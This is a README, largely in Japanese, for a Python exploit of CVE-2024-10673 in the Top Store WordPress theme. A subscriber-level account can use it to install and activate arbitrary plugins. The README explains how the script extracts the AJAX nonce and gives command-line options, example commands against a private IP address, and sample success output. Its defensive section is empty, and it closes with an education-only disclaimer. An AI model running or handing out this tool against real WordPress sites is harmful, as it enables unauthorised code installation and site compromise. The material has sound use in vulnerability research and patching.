
Top Store <= 1.5.4 - Authenticated (Subscriber+) 任意のプラグインのインストール/有効化
このスクリプトは CVE-2024-10673 を悪用します。これは Top Store WordPress テーマ (<= 1.5.4) に見つかった重大な脆弱性です。この欠陥により、購読者以上のアクセス権を持つ認証済みユーザー が、保護されていない AJAX リクエストを介して任意のプラグインをインストールおよび有効化できるようになります。
nonce を動的に抽出することで攻撃を自動化します。themes.php?page=thunk_started からAJAX nonce を抽出します。hunk-companion またはユーザー定義のプラグイン)。usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
-un USERNAME, --username USERNAME
WordPress Username
-p PASSWORD, --password PASSWORD
WordPress Password
-pl PLUGIN, --plugin PLUGIN
Plugin slug to install and activate (default: hunk-companion)
hunk-companion) をインストールして有効化:
python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
woocommerce) をインストールして有効化:
python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}
WordPress サイトを保護するには:
このスクリプトは教育およびセキュリティ研究目的のみです。 所有していない、または明示的なテスト許可がないシステムに対する不正使用は違法です。責任を持って使用してください!
作成者: Khaled Alenazi (Nxploit)